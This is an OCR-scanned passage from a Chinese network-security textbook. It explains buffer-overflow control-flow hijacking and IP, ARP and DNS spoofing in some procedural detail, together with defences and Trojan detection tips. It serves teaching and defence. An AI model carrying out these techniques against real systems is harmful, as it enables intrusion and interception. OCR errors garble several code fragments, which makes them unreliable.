比如 ,攻击 代码 要 求 执行 “exec('bin/sh'")”, 而 在 libc 库 中 的 代码 执行 “execCarg)”, 其 中 arg 
是 一 个 指向 字符 串 的 指针 参数 ,那么 攻击 者 只 要 把 传人 的 参数 指针 改 向 指向 “/bin/sh”, 然 
后 跳 转 到 libc 库 中 相应 的 指令 序列 即 可 。 

2) 控制 程序 转移 到 攻击 代码 的 方法 

所 有 这 些 方法 都 是 在 试图 改变 程序 的 执行 流程 ,使 之 跳 转 到 攻击 代码 。 其 基本 特点 就 
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是 给 没有 边界 检查 或 有 其 他 弱点 的 程序 送出 一 个 超 长 的 缓冲 区 ,以 达到 扰乱 程序 正常 执行 
顺序 的 目的 。 通 过 溢出 一 个 缓冲 区 ,攻击 者 可 以 用 几乎 暴力 的 方法 (穷尽 法 ) 改 写 相 邻 的 程 
序 空 间 而 直接 跳 过 系统 的 检查 。 这 里 的 分 类 基准 是 攻击 者 所 寻求 的 缓冲 区 溢出 的 程序 空间 
类 型 ,原则 上 可 以 是 任意 的 空间 。 实 际 上 许多 的 缓冲 区 溢出 是 用 暴力 的 方法 来 寻求 改变 程 
序 指针 的 。 这 类 程序 不 同 的 地 方 就 是 程序 空间 的 突破 和 内 存 空 间 的 定位 不 同 。 一 般 来 说 ， 
控制 程序 转移 到 攻击 代码 的 方法 有 以 下 几 种 。 

@ 函数 返回 地 址 。 每 当 一 个 函数 调用 发 生 时 ,调用 者 会 在 堆栈 中 留 下 函数 返回 地 址 ， 
它 包 会 函数 结束 时 返回 的 地 址 。 攻 击 者 通过 溢出 这 些 自动 变量 ,使 这 个 返回 地 址 指向 攻击 
代码 ,这 样 就 改变 了 程序 的 返回 地 址 。 当 函数 调用 结束 时 ,程序 跳 转 到 攻击 者 设 定 的 地 址 ， 
而 不 是 原来 的 地 址 。 这 类 缓冲 区 溢出 被 称 为 “stack smashing attack”, 是 目前 常用 的 缓冲 区 
溢出 攻击 方式 。 

@ 函数 指针 。“Void( * fo0)QO” 中 声明 了 一 个 返回 值 为 Void 函数 指针 的 变量 foo。 函 
数 指针 可 以 定位 任何 地 址 空间 ,所 以 攻击 者 只 需 在 任何 空间 内 的 函数 指针 附近 找到 一 个 能 
够 溢出 的 缓冲 区 ,通过 溢出 来 改变 函数 指针 , 当 程 序 通 过 函数 指针 调用 函数 时 ,程序 的 流程 
就 会 发 生 改 变 而 实现 攻击 者 的 目的 。 

@ 长 跳 转 缓冲 区 。 在 C 语言 中 包含 一 个 简单 的 检验 /恢复 系统 , 称 为 “setjmp/longjmp”， 
意思 是 在 检验 点 设 定 “setjmp(buffer)”, 用 “longjmp(buffer)” 来 恢复 检验 点 。 然 而 ,如 果 攻 
击 时 能 够 进入 缓冲 区 的 空间 ,那么 “longjmp(buffer)” 实 际 上 是 跳 转 到 攻击 者 的 代码 。 像 函 
数 指针 一 样 ,longjmp 缓冲 区 能 够 指向 任何 地 方 ,所 以 攻击 者 所 要 做 的 就 是 找到 一 个 可 供 洪 
出 的 缓冲 区 。 

3) 综合 代码 植 入 和 流程 控制 技术 

最 简单 和 常见 的 缓冲 区 溢出 攻击 类 型 就 是 在 一 个 字符 串 里 综合 了 代码 植 人 和 激活 记 
录 。 攻 击 者 定位 了 一 个 可 供 溢 出 的 自动 变量 ,然后 向 程序 传递 一 个 很 大 的 字符 串 ,在 引发 组 
冲 区 溢出 改变 激活 记录 的 同时 植 人 了 代码 (因为 C 语言 程序 员 通 常 在 习惯 上 只 为 用 户 和 参 
数 开辟 很 小 的 缓冲 区 )。 代码 植 和 信和 缓冲 区 溢出 不 一 定 要 在 一 次 动作 内 完成 ,攻击 者 可 以 在 
一 个 缓冲 区 内 放置 代码 (这 个 时 候 并 不 能 溢出 缓冲 区 ) ,然后 攻击 者 通过 溢出 另 一 个 缓冲 区 
来 转移 程序 的 指针 。 这 样 的 方法 一 般 用 来 解决 可 供 溢出 的 缓冲 区 不 够 大 (不 能 存放 全 部 的 
代码 ) 。 如 果 攻 击 者 试图 使 用 已 经 常 驻 的 代码 而 不 是 从 外 部 植 人 代码 ,他 们 通常 必须 把 代码 
作为 参数 。 

3. 缓冲 区 溢出 防范 

缓冲 区 溢出 攻击 的 防范 是 和 整个 系统 的 安全 性 分 不 开 的 。 如 果 整 个 网 络 系统 的 安全 设 
计 很 差 , 则 遭受 缓冲 区 溢出 攻击 的 机 会 也 大 大 增加 。 针 对 缓冲 区 溢出 ,可 以 采取 多 种 防范 
策略 。 

1) 系统 管理 上 的 防范 策略 

Q@ 关闭 不 需要 的 特权 程序 。 由 于 缓冲 区 溢出 只 有 在 获得 更 高 的 特权 时 才 有 意义 ,所 以 
带 有 特权 的 UNIX 下 的 suid 程序 和 Windows 下 由 系统 管理 员 启 动 的 服务 进程 都 经 常 是 缓 
冲 区 溢出 攻击 的 目标 。 这 时 候 , 关 闭 一 些 不 必要 的 特权 程序 就 可 以 降低 被 攻击 的 风险 。 

@ 安装 程序 补丁 。 这 是 漏洞 出 现 后 最 迅速 有 效 的 补救 措施 。 大 部 分 的 入侵 是 利用 一 
些 已 被 公布 的 漏洞 完成 的 ,如 能 及 时 补 上 这 些 漏洞 ,无疑 极 大 地 增强 了 系统 抵抗 攻击 的 能 
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力 。 这 两 种 措施 对 管理 员 来 说 ,代价 都 不 是 很 高 ,但 能 很 有 效 地 防止 大 部 分 的 攻击 企图 。 

2) 软件 开发 过 程 中 的 防范 策略 

发 生 缓冲 区 溢出 的 主要 原因 有 : 数组 没有 进行 边界 检查 而 导致 的 缓冲 区 溢出 ; 函数 返 
回 地址 或 函数 指针 被 改变 ,使 程序 流程 的 改变 成 为 可 能 ; 植 入 代码 被 成 功 执行 等 。 所 以 针 
对 这 些 要 素 , 从 技术 上 可 以 采取 一 定 的 措施 来 防范 ,采取 的 措施 主要 有 以 下 几 个 。 

(1) 编写 正确 的 代码 

由 于 缓冲 区 溢出 主要 发 生 在 进行 数据 拷贝 等 一 些 操 作 中 ,所 以 只 要 在 所 有 拷贝 数据 的 
地 方 进行 数据 长 度 和 有 效 性 的 检查 ,确保 目标 缓冲 区 中 数据 不 越界 并 有 效 ,就 可 以 避免 缓冲 
区 溢出 ,更 不 可 能 使 程序 跳 转 到 恶意 代码 上 。 但 是 诸如 C/C++ 自身 是 一 种 不 进行 数据 类 型 
和 长 度 检查 的 程序 设计 语言 ,而 程序 员 在 编写 代码 时 由 于 开发 速度 和 代码 的 简洁 性 ,往往 忽 
视 了 程序 的 健壮 性 ,从 而 导致 缓冲 区 溢出 ,因此 必须 从 程序 语言 和 系统 结构 方面 加 强 防 范 。 
很 多 不 安全 程序 的 出 现 是 由 于 调用 了 一 些 不 安全 的 库 函 数 ,这 些 库 函数 往往 没有 对 数组 边 
界 进 行 检查 ,如 函数 strcpy()。 所 以 一 种 简单 的 方法 是 进行 搜索 源 程序 , 找 出 对 这 些 函 数 的 
调用 ,然后 代 以 更 安全 的 函数 。 进 一 步 的 查找 可 以 是 检查 更 广 范围 的 不 安全 操作 ,如 在 一 个 
不 定 循环 中 对 数组 的 赋值 等 。 

(2) 缓冲 区 不 可 执行 

通过 使 被 攻击 程序 的 数据 段 地 址 空间 不 可 执行 ,从 而 使 得 攻击 者 不 可 能 执行 被 植 入 攻 
击 程序 输入 缓冲 区 的 代码 ,这 种 技术 被 称 为 缓冲 区 不 可 执行 技术 。 事 实 上 ,很 多 老 的 UNIX 
系统 都 是 这 样 设计 的 ,但 是 近来 的 UNIX 和 MS Windows 系统 为 实现 更 好 的 性 能 和 功能 ， 
往往 在 数据 段 中 动态 地 放 和 人 可 执行 的 代码 。 所 以 为 了 保持 程序 的 兼容 性 不 可 能 使 得 所 有 程 
序 的 数据 段 不 可 执行 。 但 是 可 以 设 定 堆栈 数据 段 不 可 执行 ,这 样 就 可 以 最 大 限度 地 保证 程 
序 的 兼容 性 。 非 执行 堆栈 的 保护 可 以 有 效 地 对 付 把 代码 植 入 自动 变量 的 缓冲 区 浇 出 攻击 ， 
而 对 于 其 他 形式 的 攻击 则 没有 效果 。 通 过 引用 一 个 驻 留 的 程序 的 指针 ,就 可 以 跳 过 这 种 保 
护 措 施 。 

(3) 数组 边界 检查 

可 以 说 缓冲 区 溢出 的 根本 原因 是 没有 进行 数组 边界 检查 , 当 数 组 被 溢出 的 时 候 ,一些 关 
键 的 数据 就 有 可 能 被 修改 ,比如 函数 返回 地 址 .过 程 指针 、 函 数 指针 等 。 同 时 ,攻击 代码 也 可 
以 被 植 人 。 因 此 ,对 数组 进行 边界 检查 ,使 超 长 代码 不 可 能 植 入 ,这 样 就 完全 没有 了 缓冲 区 
溢出 攻击 产生 的 条 件 。 只 要 数组 不 能 被 溢出 ,溢出 攻击 就 无 从 谈 起 。 为 了 实现 数组 边界 检 
查 , 则 所 有 的 对 数组 的 读 写 操作 都 应 当 被 检查 ,以 确保 对 数组 的 操作 在 正确 的 范围 内 。 最 直 
接 的 方法 是 检查 所 有 的 数组 操作 ,但 是 会 使 性 能 下 降 很 多 ,通常 可 以 采用 一 些 优化 的 技术 来 
减少 检查 的 次 数 。 

(4) 程序 指针 完整 性 检查 

程序 指针 完整 性 检查 是 针对 上 述 缓 冲 区 溢出 的 另 一 个 要 素 一 一 阻止 由 于 函数 返回 地 址 
或 函数 指针 的 改变 而 导致 的 程序 执行 流程 的 改变 。 它 的 原理 是 在 每 次 程序 指针 被 引用 之 前 
先 检 测 该 指针 是 否 已 被 恶意 改动 过 ,如 果 发 现 被 改动 ,程序 就 拒绝 执行 。 因 此 ,即使 一 个 攻 
击 者 成 功 地 改变 程序 的 指针 ,由 于 系统 事先 检测 到 了 指针 的 改变 ,因此 这 个 指针 不 会 被 使 
用 。 与 数组 边界 检查 相 比 ,这 种 方法 不 能 解决 所 有 的 缓冲 区 溢出 问题 。 但 这 种 方法 在 性 能 
上 有 很 大 的 优势 ,而且 兼 容 性 也 很 好 。 
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5.2.5 特洛伊 木马 攻击 及 其 防范 方法 


对 于 特洛伊 木马 的 相关 概念 ,第 6 章 有 详细 介绍 ,下 面 只 针对 它 的 防范 措施 ,做 一 下 
介绍 。 
(1) 端口 扫描 。 端 口 扫描 是 检查 远程 机 器 有 无 木马 的 最 好 办 法 ,但 对 于 驱动 程序 /动态 
链接 木马 ,端口 扫描 是 不 起 作用 的 。 

(2) 查看 连接 。 端 口 扫描 和 查看 连接 原理 基本 相同 ,不 过 是 在 本 机 上 通过 netstat -a 查 
看 所 有 的 TCP/IP 连接 ,查看 连接 要 比 端口 扫描 快 ,但 同样 是 无 法 查 出 驱动 程序 /动态 链接 
木马 ,而 且 仅 在 本 地 使 用 。 

(3) 查看 注册 表 。 由 于 木马 可 以 通过 注册 表 启 动 ,那么 ,同样 可 以 通过 检查 注册 表 来 发 
现 木 马 在 注册 表 里 留 下 的 痕迹 。 

(4) 查找 文件 。 查 找 木 马 特 定 的 文件 也 是 一 个 常用 的 方法 ,如 冰河 木马 的 一 个 特征 文 
件 是 kern132. exe, 男 一 个 是 sysexlpr. exe, 只 要 删除 了 这 两 个 文件 ,木马 就 不 起 作用 了 。 但 
也 要 注意 ,在 对 注册 表 进 行 修改 时 ,要 做 好 备份 ,如 果 进 行 了 错误 的 修改 ,还 可 以 进行 恢复 。 
其 实 最 简单 的 查 杀 木马 的 方法 是 安装 杀毒 软件 ,现在 很 多 杀毒 软件 能 删除 常见 的 木马 。 


5.2.6 欺骗 攻击 及 其 防范 方法 


网 络 欺骗 从 安全 学 角度 上 说 就 是 使 入 侵 者 相信 信息 系统 存在 有 价值 的 ,可 利用 的 安全 
弱点 ,并 具有 一 些 可 攻击 窃取 的 资源 (当然 这 些 资源 是 伪造 的 或 不 重要 的 ) ,并 将 入 侵 者 引 向 
这 些 错误 的 资源 。 它 能 够 显著 地 增加 入 侵 者 的 工作 量 、 入 侵 复杂 度 以 及 不 确定 性 ,从 而 使 入 
侵 者 不 知道 其 进攻 是 否 奏效 或 成 功 。 而 且 , 它 允许 防护 者 跟踪 入 侵 者 的 行为 ,在 入 侵 者 之 前 
修补 系统 可 能 存在 的 安全 漏洞 。 相 对 地 ,欺骗 攻击 就 是 利用 假冒 ,伪装 后 的 身份 与 其 他 主机 
进行 合法 的 通信 或 发 送 假 的 报 文 ,使 受 攻 击 的 主机 出 现 错误 ,或 者 是 伪造 一 系列 假 的 网 络 地 
址 和 网 络 空间 顶替 真正 的 网 络 主机 为 用 户 提供 网 络 服务 ,以 此 方法 获得 访问 用 户 的 合法 信 
息 后 加 以 利用 , 转 而 攻击 主机 的 一 种 攻击 方式 。 

常见 的 网 络 欺骗 攻击 主要 方式 有 IP 欺骗 ,ARP 欺骗 ,DNS 欺骗 .Web 欺骗 .电子 邮件 

1. IP 欺骗 


1) IP 欺骗 的 定义 

IP 欺骗 就 是 伪造 他 人 的 IP 地 址 与 人 侵 主机 联系 ,通过 用 另外 一 台 机 器 来 代替 自己 的 
方式 借以 达到 蒙混 过 关 的 目的 。 

2) IP 欺骗 的 原理 

IP 欺骗 动 技术 就 是 伪造 某 台 主机 的 IP 地 址 的 技术 。 通 过 IP 地 址 的 伪装 使 得 某 台 
机 能 够 伪装 成 另外 一 台 主 机 ,而 被 伪造 了 IP 地 址 的 这 人 台 主 机 往往 具有 某 种 特权 或 被 另外 的 
主机 所 信任 。 

假设 同一 网 段 内 有 两 台 主 机 A、B. 另 一 网 段 内 有 主机 X。B 授予 A 某 些 特权 。X 为 获 
得 与 A 相同 的 特权 ,所 做 欺骗 攻击 如 下 : 首先 ,X 冒充 A, 向 主机 B 发 送 一 个 带 有 随机 序列 
号 的 SYN 包 。 主 机 B 响应 , 回 送 一 个 应 答 包 给 A ,该 应 答 号 等 于 原 序列 号 加 1。 然而 ,此 时 
主机 A 已 被 主机 X 利用 拒绝 服务 攻击 “淹没 "了 ,导致 主机 A 服务 失效 。 结 果 , 主 机 A 将 B 
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发 来 的 包 丢 弃 。 为 了 完成 三 次 握手 ,X 还 需要 向 B 回 送 一 个 应 答 包 ,其 应 答 号 等 于 了 B 向 A 
发 送 数据 包 的 序列 号 加 1。 此 时 主机 X 并 不 能 检测 到 主机 B 的 数据 包 ( 因 为 不 在 同一 网 
段 ) ,只 有 利用 TCP 顺序 号 估算 法 来 预测 应 答 包 的 顺序 号 并 将 其 发 送 给 目标 机 B。 如 果 猜 
测 正确 ,B 则 认为 收 到 的 ACK 是 来 自 内 部 主机 A。 此 时 ,X 即 获得 了 主机 A 在 主机 B 上 所 
享有 的 特权 ,并 开始 对 这 些 服务 实施 攻击 。 

3) IP 欺骗 的 步骤 

IP 欺骗 由 若干 步骤 组 成 ,这 里 先 简要 地 描述 一 下 ,随后 再 做 详尽 的 解释 。 首 先 , 选 定 目 
标 主机 。 其 次 ,发现 信任 模式 ,并 找到 一 个 被 目标 主机 信任 的 主机 。 黑 客 为 了 进行 IP 欺骗 ， 
进行 以 下 工作 : 使 得 被 信任 的 主机 丧 失 工 作 能 力 ,同时 采用 目标 主机 发 出 的 TCP 序列 号 ， 
猜测 出 它 的 数据 序列 号 。 然 后 ,攻击 者 伪装 成 被 信任 的 主机 ,同时 建立 起 与 目标 主机 基于 地 
址 验证 的 应 用 连接 。 如 果 成 功 ,黑客 可 以 使 用 一 种 简单 的 命令 放置 一 个 系统 后 门 ,以 进行 非 
授权 操作 。 具 体 过 程 如 下 。 

(1) 使 被 信任 主机 丧 失 工作 能 力 

一 旦 发 现 被 信任 的 主机 ,为 了 伪装 成 它 ,往往 使 其 丧失 工作 能 力 。 由 于 攻击 者 将 要 代替 
真正 的 被 信任 主机 ,他 必须 确保 真正 被 信任 的 主机 不 能 接收 到 任何 有 效 的 网 络 数据 ,否则 将 
会 被 揭穿 。 有 许多 方法 可 以 做 到 这 些 。 这 里 介绍 "TCP SYN 淹没 "。 前 面 已 经 谈 到 ,建立 
TCP 连接 的 第 一 步 就 是 客户 端 向 服务 器 发 送 SYN 请 求 。 通 常 ,服务 器 将 向 客户 端 发 送 
SYN/ACK 信和 号。 这 里 客户 端 是 由 IP 地 址 确定 的 。 客 户 端 随后 向 服务 器 发 送 ACK ,然后 
数据 传输 就 可 以 进行 了 。 然 而 ,TCP 处 理 模 块 有 一 个 处 理 并 行 SYN 请 求 的 上 限 , 它 可 以 看 
做 是 存放 多 条 连接 的 队列 长 度 。 其 中 ,连接 数目 包括 那些 三 次 握手 没有 最 终 完 成 的 连接 ,也 
包括 那些 已 成 功 完成 握手 ,但 还 没有 被 应 用 程序 所 调用 的 连接 。 如 果 达 到 队列 的 上 限 ,TCP 
将 拒绝 所 有 连接 请 求 ,直至 处 理 了 部 分 连接 链 路 。 这 样 就 给 攻击 者 提供 了 机 会 。 

黑客 往往 向 被 进攻 目标 的 TCP 端口 发 送 大 量 SYN 请 求 ,这 些 请 求 的 源 地 址 是 使 用 一 
个 合法 的 但 是 虚假 的 IP 地 址 (可 能 使 用 该 合法 IP 地 址 的 主机 没有 开机 )。 按 照 协议 , 受 攻 
击 的 主机 是 会 向 该 IP 地 址 发 送 响 应 的 ,但 实际 上 是 不 会 收 到 任何 的 应 答 数据 包 的 。 同 时 
IP 包 会 通知 受 攻击 主机 的 TCP: 该 主机 不 可 到 达 , 但 TCP 会 认为 这 是 一 种 暂时 错误 ,会 继 
续 尝 试 连接 ,直至 确认 无 法 连接 。 在 上 面 黑客 使 用 的 IP 地 址 应 该 是 不 工作 主机 的 ,因为 如 
果 不 是 , 则 真正 的 IP 持 有 者 会 收 到 SYN/ACK 响应 ,而 随 之 发 送 RST 给 受 攻击 主机 ,从 而 
断 开 连接 。 

(2) 序列 号 取样 和 猜测 

要 对 目标 主机 进行 攻击 ,必须 知道 目标 主机 使 用 的 数据 包 序 列 号 。 攻 击 者 先 与 被 攻击 
主机 的 一 个 端口 (SMTP 是 一 个 很 好 的 选择 ) 建 立 起 正常 的 连接 。 通 常 ,这 个 过 程 被 重复 若 
干 次 ,并 将 目标 主机 最 后 所 发 送 的 序列 号 ISN 存储 起 来 。 攻 击 者 还 需要 估计 他 的 主机 与 被 
信任 主机 之 间 的 RTT( 往 返 时 间 ) ,这 个 RTT 是 通过 多 次 统计 平均 求 出 的 。RTT 对 于 估计 
下 一 个 ISN 是 非常 重要 的 。 当 估算 出 ISN 大 小 后 ,就 可 以 开始 进行 攻击 。 当 黑客 的 虚假 
TCP 数据 包 进 入 目标 主机 时 ,根据 估计 的 准确 度 不 同 , 会 发 生 以 下 不 同 的 情况 。 

如 果 估 计 的 序列 号 是 准确 的 ,进入 的 数据 将 被 放置 在 接收 缓冲 器 以 供 使 用 。 

如 果 估 计 的 序列 号 小 于 期 待 的 数字 ,那么 将 被 放弃 。 

如 果 估 计 的 序列 号 大 于 期 待 的 数字 ,并 且 在 滑动 窗口 (前 面 讲 的 缓冲 ) 之 内 ,那么 ,该 数 
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据 被 认为 是 一 个 未 来 的 数据 ,TCP 模块 将 等 待 其 他 缺少 的 数据 。 如 果 估计 的 序列 号 大 于 期 
待 的 数字 ,并且 不 在 滑动 窗口 (前 面 讲 的 缓冲 ) 之 内 ,那么 ,TCP 将 会 放弃 该 数据 并 返回 一 个 
期 望 获得 的 数据 序列 号 。 

攻击 者 伪装 成 被 信任 主机 的 IP 地 址 ,此 时 ,该 主机 仍然 处 在 停顿 状态 (已 丧失 处 理 能 
力 ) ,然后 向 目标 主机 的 端口 发 送 连接 请 求 ,目标 主机 对 连接 请 求 做 出 反应 ,发 送 SYN/ACK 
数据 包 给 被 信任 主机 ,因为 此 时 被 信任 主机 处 于 停顿 状态 ,所 以 被 信任 主机 会 抛弃 SYN/ 
ACK 数据 包 。 攻 击 者 向 目标 主机 发 送 ACK 数据 包 , 该 ACK 使 用 前 面 估计 的 序列 号 加 1 
(确认 帧 ) 。 如 果 攻 击 者 估计 正确 ,目标 主机 将 会 接收 该 ACK。 这 样 ,连接 就 正式 建立 起 
来 了 。 

4) IP 欺骗 的 防范 

要 防止 源 IP 地 址 欺骗 行为 ,可 以 采取 以 下 措施 来 尽 可 能 地 保护 系统 免 受 这 类 攻击 。 

QO 抛弃 基于 地 址 的 信任 策略 。 阻 止 这 类 攻击 的 一 种 非常 容易 的 办 法 就 是 放弃 以 地 址 
为 基础 的 验证 。 不 允许 r* 类 远程 调用 命令 的 使 用 ; 删除 . rhosts 文件 ; 清空 /etc/hosts. equiv 
文件 。 这 将 迫使 所 有 用 户 使 用 其 他 远程 通信 手段 ,如 telnet、ssh、skey 等 。 

@ 使 用 加 密 方法 。 在 通信 时 ,通信 方 之 间 要 求 加 密 传输 和 验证 。 

@@ 进行 包 过 滤 。 确 信 只 有 内 部 LAN 可 以 使 用 信任 关系 ,而 内 网 对 于 外 部 LAN 以 外 
的 主机 要 谨慎 处 理 。 这 时 可 以 配置 路 由 器 使 其 能 够 拒绝 网 络 外 部 与 本 网 内 具有 相同 IP 地 
址 的 连接 请 求 , 同 时 也 不 把 本 网 段 主 机 的 包 发 送出 去 。 有 一 点 要 注意 ,路 由 器 虽然 可 以 封锁 
试图 到 达 内 部 网 络 的 特定 类 型 的 包 , 但 由 于 路 由 器 是 通过 分 析 测 试 源 地 址 来 进行 操作 , 因 
此 ,路 由 器 仅 能 对 声称 是 来 自 于 内 部 网 络 的 外 来 包 进 行 过 滤 , 若 路 由 器 所 连 网 络 存在 外 部 可 
信任 主机 ,那么 路 由 器 将 无 法 防止 别人 冒充 这 些 主机 进行 IP 欺骗 。 

@ 使 用 随机 的 初始 序列 号 。IP 欺骗 能 够 成 功 的 一 个 重要 因素 是 ,序列 号 不 是 随机 选择 
的 或 者 随机 增加 的 。 如 果 使 用 了 随机 化 的 序列 号 ,那么 每 一 次 访问 都 会 更 换 新 的 访问 序列 
号 ,攻击 者 就 难以 伪装 自己 对 目标 主机 的 访问 。 

2. ARP 欺骗 

ARP 是 地 址 解析 协议 , 它 将 IP 地 址 转化 为 MAC 地 址 。 在 局 域 网 中 ,通信 前 必须 通过 
ARP 来 完成 IP 地址 转换 为 第 二 层 物理 地 址 ( 即 MAC 地 址 )。ARP 对 网 络 安 全 具有 重要 的 
意义 ,但 是 最 初 ARP 方式 的 设计 没有 考虑 到 过 多 的 安全 问题 ,给 ARP 留 下 很 多 的 隐患 ， 
ARP 欺骗 就 是 其 中 的 一 个 例子 。 而 ARP 欺骗 攻击 就 是 利用 该 协议 漏洞 ,通过 伪造 IP 地 址 
和 MAC 地 址 实现 ARP 欺骗 的 攻击 技术 。 

我 们 已 经 知道 正常 情况 下 ARP 是 如 何 工作 ,但 是 由 于 ARP 先天 的 缺陷 ,还 会 出 现下 
面 的 情况 ,使 得 ARP 欺骗 得 以 成 功 。ARP 并 不 只 在 发 送 ARP 请 求 时 才 接 收 ARP 应 答 。 
如 果 攻 击 者 主动 发 出 了 ARP 应 答 包 , 当 目 标 主 机 收 到 此 数据 包 时 ,就 会 对 本 地 的 ARP 组 
存 进 行 更 新 ,将 应 答 包 中 的 IP 和 MAC 地 址 存储 在 缓存 中 。 因 此 ,当局 域 网 中 的 某 台 主机 
C 向 A 发 送 一 个 自己 伪造 的 ARP 应 答 ,而 如 果 这 个 应 答 是 C 冒充 B 的 IP, 而 MAC 地 址 是 
伪造 C 的 , 则 当 A 收 到 C 伪造 的 ARP 应 答 后 ,就 会 更 新 本 地 的 ARP 缓存 ,这 样 在 A 看 来 了 
的 IP 地址 没有 变 ,而 B 的 MAC 地 址 已 经 不 是 原来 那个 了 。 由 于 局 域 网 通信 不 是 根据 IP 
地 址 进行 ,而 是 按照 MAC 地 址 进行 传输 ,所 以 ,那个 伪造 的 MAC 与 IP 对 应 项 在 A 上 被 改 
变 成 一 个 不 存在 的 MAC 地 址 ,这 样 就 造成 网 络 不 通 。 如 果 C 是 一 个 攻击 者 ,他 把 B 的 
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MAC 换 成 C 自己 的 ,那么 C 就 可 以 截获 到 A 与 B 的 通信 ,也 就 完成 了 一 次 简单 的 ARP 
欺骗 。 

一 般 来 说 ,ARP 欺骗 攻击 的 后 果 非 常 严 重 ,如 果 在 局 域 网 中 有 机 器 中 了 ARP 欺骗 后 ， 
往往 伴随 而 来 的 是 其 他 用 户 发 现 网 速 极 慢 或 者 根本 上 不 了 网 ,时 常 掉 线 , 大 多 数 情况 下 更 会 
出 现 大 面积 掉 线 的 恶劣 后 果 。 

1) ARP 欺骗 的 种 类 

ARP 欺骗 是 黑客 常用 的 攻击 手段 之 一 。ARP 欺骗 分 为 两 种 ,一 种 是 对 路 由 器 ARP 表 
的 欺骗 ; 另 一 种 是 对 内 网 PC 的 网 关 欺 骗 。 

g@ 第 一 种 ARP 欺骗 的 原理 是 截获 网 关 数 据 。 它 通知 路 由 器 一 系列 错误 的 内 网 MAC 
地 址 ,并 按照 一 定 的 频率 不 断 进行 ,使 真实 的 地 址 信息 无 法 通过 更 新 保存 在 路 由 器 中 ,结果 
路 由 器 的 所 有 数据 只 能 发 送 给 错误 的 MAC 地 址 ,造成 正常 PC 无 法 收 到 信息 。 

@ 第 二 种 ARP 欺骗 的 原理 是 伪造 网 关 。 它 的 原理 是 建立 假 网 关 , 让 被 它 欺骗 的 PC 
向 假 网 关 发 送 数据 ,而 不 是 通过 正常 的 路 由 器 途径 上 网 。 在 PC 看 来 ,就 是 上 不 了 网 了 ,“ 网 
络 掉 线 了 ”。 

2) ARP 欺骗 的 防范 

对 于 ARP 欺骗 的 防范 ,常见 的 方法 有 以 下 几 种 。 

Q@ 不 用 把 计算 机 的 网 络 安全 信任 关系 单独 建立 在 IP 基础 上 或 MAC 基础 上 ,理想 的 关 
系 应 该 建立 在 IP 十 MAC 基础 上 。 

@ 在 客户 端 使 用 ARP 命令 绑 定 网 关 的 真实 MAC 地 址 。 

@ 在 交换 机 上 设置 端口 与 MAC 地 址 的 静态 绑 定 。 

@ 在 路 由 器 设置 IP 地 址 与 MAC 地 址 的 静态 绑 定 。 

@ 管理 员 定期 用 响应 的 IP 包 获 得 一 个 RARP 请 求 , 然 后 检查 ARP 响应 的 真实 情况 ， 
发 现 异常 立即 处 理 。 同 时 ,管理 员 要 定期 轮 询 , 经 常 检查 主机 上 的 ARP 缓存 。 

@ 使 用 防火 墙 连续 监控 网 络 。 注 意 在 使 用 SNMP 的 情况 下 ,ARP 的 欺骗 可 能 导致 陷 

3. DNS 欺骗 

1) DNS 欺骗 的 概念 

DNS 欺骗 就 是 攻击 者 冒充 DNS 服务 器 进行 网 络 攻击 的 一 种 欺骗 行为 。 攻 击 实施 后 ， 
攻击 者 会 用 一 台 主 机 冒充 域名 服务 器 ,然后 把 查询 的 IP 地 址 设 为 攻击 者 主机 的 IP 地 址 ,这 
样 ,用 户 上 网 就 只 能 看 到 攻击 者 的 主页 ,而 不 是 用 户 想 要 取得 的 网 站 的 主页 了 ,这 就 是 DNS 
欺骗 的 基本 原理 。DNS 欺骗 其 实 并 不 是 真 地 “ 黑 掉 ”了 对 方 的 网 站 ,而 是 用 自己 的 网 站 冒名 
顶 蔡 了 合法 的 网 站 。 

2) DNS 欺骗 的 工作 原理 

首先 了 解 一 下 DNS 的 工作 原理 。 当 客户 端 向 DNS 服务 器 查询 一 个 域名 时 ,本 地 的 
DNS 服务 器 会 先 在 自己 的 数据 库 中 进行 查找 ,如 果 没 有 匹配 的 信息 , 则 它 会 向 指定 的 DNS 
服务 器 查询 。 当 DNS 客户 端 向 指定 的 DNS 服务 器 进行 查询 时 ,DNS 服务 器 同样 进行 查 
找 。 如 果 该 服务 器 没有 在 自己 的 数据 库 中 找到 , 则 会 到 自己 的 缓存 区 中 查询 ,如 果 找 到 则 服 
务 器 会 把 这 条 记录 传 回 客户 端 。 如 果 服 务 器 在 数据 库 中 没有 查 到 , 且 在 缓存 区 也 没有 找到 ， 
则 服务 器 会 找 最 接近 的 备 选 服务 器 帮忙 , 备 选 服务 器 重复 上 面 的 动作 。 当 查询 到 后 , 备 选 服 
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务 器 将 信息 返回 到 主 服务 器 , 主 DNS 服务 器 先 将 信息 保存 在 缓存 区 中 ,最 后 把 结果 返回 给 
客户 端 。 如 果 没 有 找到 相应 的 信息 ,将 会 在 浏览 器 中 报告 HTTP 错误 。 

根据 这 个 DNS 的 工作 原理 ,攻击 者 就 可 以 通过 拦截 并 修改 数据 包 来 实行 DNS 欺骗 。 
当 客 户 端 向 DNS 服务 器 查询 某 个 域名 时 ,正常 情况 下 ,DNS 服务 器 经 查询 后 ,会 返回 相应 
结果 到 客户 端 。 但 是 ,如 果 攻 击 者 此 时 冒充 此 DNS 服务 器 ,攻击 者 的 机 器 就 会 代替 真正 的 
DNS 服务 器 回应 客户 端 ,并 且 数 据 包 中 的 地 址 会 指向 一 个 错误 伪造 的 地 址 ,这 样 , 当 用 户 访 
问 查询 到 的 地 址 时 ,就 会 转向 攻击 者 提供 的 地 址 ,这 样 就 实现 了 DNS 欺骗 。 

3) DNS 欺骗 的 方法 

(1) 缓存 感染 

黑客 会 熟练 地 使 用 DNS 请 求 , 将 数据 放 入 一 个 没有 设防 的 DNS 服务 器 的 缓存 当中 。 
这 些 缓存 信息 会 在 客户 进行 DNS 访问 时 返回 给 客户 ,从 而 将 客户 引导 到 入 侵 者 所 设置 的 运 
行 木马 的 Web 服务 器 或 邮件 服务 器 上 ,然后 黑客 从 这 些 服务 器 上 获取 用 户 信息 。 

(2) DNS 信息 劫持 

入 侵 者 通过 监听 客户 端 和 DNS 服务 器 的 对 话 ,通过 猜测 服务 器 响应 给 客户 端的 DNS 
来 查询 ID。 每 个 DNS 报 文 包括 一 个 相关 联 的 16 位 ID 号 ,DNS 服务 器 根据 这 个 ID 号 获取 
请 求 源 位 置 。 黑 客 在 DNS 服务 器 之 前 将 虚假 的 响应 交 给 用 户 , 从 而 欺骗 客户 端 去 访问 恶意 
的 网 站 。 

(3) DNS 重 定向 

